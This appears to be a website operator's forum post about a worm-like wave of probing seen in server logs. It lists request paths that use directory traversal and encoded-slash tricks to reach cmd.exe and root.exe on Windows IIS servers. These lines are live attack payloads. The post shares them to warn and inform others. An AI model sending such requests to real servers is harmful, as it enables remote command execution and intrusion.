I just noticed it this morning. I run my own website, and always watch the logs very carefully. Well thismorning a machine in Texas was hammering me for some windows system files. I mean it would ask several times an hour. I was going to shut him out, by source ip, with my firewall, when some other machines in Texas began asking for those same files. Then a machine in Tennessee began, and it seems to be spreading. This afternoon a friend called and said several files on his windows box were corrupted. These were essentially the same files that were requested from my web server. The files are critical to Windows, and corrupted beyond repair, so he had to reinstall all of windows. I hope he had other things backed up. Here are some of the files attacked by the virus. This from my web server logs. MSADC/root.exe _mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe _vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe c/winnt/system32/cmd.exe d/winnt/system32/cmd.exe msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe scripts/..%%35%63../winnt/system32/cmd.exe scripts/..%%35c../winnt/system32/cmd.exe scripts/..%25%35%63../winnt/system32/cmd.exe scripts/..%252f../winnt/system32/cmd.exe scripts/..%255c../winnt/system32/cmd.exe scripts/..%c0%2f../winnt/system32/cmd.exe scripts/..%c0%af../winnt/system32/cmd.exe scripts/..%c1%1c../winnt/system32/cmd.exe scripts/..%c1%9c../winnt/system32/cmd.exe scripts/root.exe